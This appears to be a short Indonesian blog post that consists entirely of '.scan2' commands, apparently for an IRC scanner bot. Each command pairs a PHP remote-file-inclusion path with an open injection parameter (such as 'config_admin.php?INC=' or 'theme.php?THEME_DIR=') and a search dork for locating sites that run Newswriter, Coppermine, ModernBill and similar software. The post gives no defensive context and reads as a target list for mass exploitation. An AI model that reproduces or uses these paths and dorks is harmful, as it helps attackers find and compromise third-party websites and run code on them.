.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter”
.scan2 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine”
.scan2 /config.inc.php?path_escape= “Your Personal Search Advisor !”
.scan2 /include/scripts/export_batch.inc.php?DIR= “ModernBill”
.scan2 /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+your+site%22+%22%7C%22+%22affiliate+program%22+%22%7C%22+%22privacy%22+%22%7C%22+%22terms%22
.scan2 /include/admin.lib.inc.php?site_path= /view.php?bbs_id=
.scan2 /clmcpreload.php?CLPATH= “© Philip Boone”
Diposting oleh anak nyangkruq di 02.05 0 komentar